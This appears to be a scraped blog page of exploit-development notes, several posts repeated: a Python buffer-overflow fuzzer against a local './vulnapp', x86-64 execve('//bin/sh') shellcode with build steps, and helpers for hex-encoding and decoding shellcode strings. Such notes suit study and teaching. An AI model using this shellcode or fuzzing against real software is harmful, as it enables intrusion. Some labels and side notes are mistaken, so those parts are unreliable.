import os
for i in range(500,1000,1):
cmd = ("python -c \"print('A' * %d)\"" % i)
print("fuzzing length %d" % i)
os.system("%s | ./vulnapp" % cmd)
notes:
this is passing AAAAA where length is 500,501,502, ... all the way to 1000
and just looking to see when the program set faults, at which input length
Wednesday, March 11, 2020
Tuesday, March 10, 2020
shellcode in ASM to C program examples
not optimized for shortness
does not remove null (00) characters
--------
using data
--------
section .text
global _start
_start:
xor rdi, rdi ;null char to term string
push rdi
mov rdi, 0x68732f6e69622f2f ; //bin/sh
push rdi
mov rdi, rsp ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
--------
using push
--------
section .data
sh: db "//bin/sh"
section .text
global _start
_start:
mov rdi, sh ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
does not remove null (00) characters
--------
using data
--------
section .text
global _start
_start:
xor rdi, rdi ;null char to term string
push rdi
mov rdi, 0x68732f6e69622f2f ; //bin/sh
push rdi
mov rdi, rsp ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
--------
using push
--------
section .data
sh: db "//bin/sh"
section .text
global _start
_start:
mov rdi, sh ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
Convert String to Shell Code Hex in Python
if you want
//bin/sh
to become hex you can use in assembly for shell code
>>> for word in (re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode())):
... byte = re.findall(".{2}", word)
... cmd = ""
... for index in range(len(byte)-1,-1,-1):
... cmd = cmd + byte[index]
... print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e
side notes
binascii.hexlify converts string to binary
re.findall(".{8}", finds the words
re.findall(".{2}" , finds the bytes
range(... ,... , -1) loops through the bytes in each word backwards (endianess)
cmd = cmd + ... rebuilds the hex in the correct order
//bin/sh
to become hex you can use in assembly for shell code
>>> for word in (re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode())):
... byte = re.findall(".{2}", word)
... cmd = ""
... for index in range(len(byte)-1,-1,-1):
... cmd = cmd + byte[index]
... print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e
side notes
binascii.hexlify converts string to binary
re.findall(".{8}", finds the words
re.findall(".{2}" , finds the bytes
range(... ,... , -1) loops through the bytes in each word backwards (endianess)
cmd = cmd + ... rebuilds the hex in the correct order
Decode ShellCode String in Python
if you see this
push 0x68732f2f
push 0x6e69622f
it may be a string
you can use python 3 to decode and see
import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'
yep! shellcode
//sh/bin
side note:
binascii.hexlify was used to convert the hex to a binary
decode() was used to convert the binary to a string
[::-1] was used to reverse the string's characters
push 0x68732f2f
push 0x6e69622f
it may be a string
you can use python 3 to decode and see
import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'
yep! shellcode
//sh/bin
side note:
binascii.hexlify was used to convert the hex to a binary
decode() was used to convert the binary to a string
[::-1] was used to reverse the string's characters
Subscribe to:
Posts (Atom)